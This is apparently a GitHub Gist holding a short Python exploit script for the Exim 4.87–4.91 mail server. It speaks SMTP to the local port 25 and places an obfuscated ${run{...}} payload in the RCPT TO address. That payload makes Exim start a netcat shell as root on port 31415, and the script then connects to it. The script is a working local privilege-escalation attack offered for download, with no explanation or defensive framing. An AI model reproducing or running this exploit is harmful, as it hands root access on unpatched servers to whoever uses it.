Created
April 19, 2020 15:08
-
-
Save Stick-U235/5b3657428450be24a12673623b800a49 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Spawns a netcat shell on port 31415 as root, then connects to it | |
# Vulnerablity is within Exim 4.87-4.91 | |
# | |
import subprocess | |
import socket | |
import os | |
import time | |
from subprocess import Popen, PIPE | |
payload = b'${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31415\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost' | |
myhost = os.uname()[1] | |
proc = subprocess.Popen(["nc", "localhost", "25"], stdin=PIPE, stdout=PIPE) | |
stdout = (repr(proc.stdout.readline())) | |
print(stdout) | |
if ("220" in stdout): #Wait for 220 so we can start sending commands | |
proc.stdin.write((b'HELO ') + myhost.encode() + b'\n') | |
proc.stdin.flush() | |
print(repr(proc.stdout.readline())) | |
proc.stdin.write(b'MAIL FROM:<>\n') | |
proc.stdin.flush() | |
print(repr(proc.stdout.readline())) | |
proc.stdin.write(b'RCPT TO:<'+ payload + b'>\n') | |
proc.stdin.flush() | |
print(repr(proc.stdout.readline())) | |
proc.stdin.write(b'DATA\n') | |
proc.stdin.flush() | |
print(repr(proc.stdout.readline())) | |
for i in range(1,32): | |
proc.stdin.write(b'Received:' + b' ' + bytes(i) + b'\n') | |
proc.stdin.flush() | |
#print(i) | |
proc.stdin.write(b'\n.\n') | |
proc.stdin.flush() | |
print(repr(proc.stdout.readline())) | |
proc.stdin.write(b'QUIT\n') | |
proc.stdin.flush() | |
print(repr(proc.stdout.readline())) | |
time.sleep(1) | |
print("[+] Dropping into shell...") | |
os.system("nc localhost 31415") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment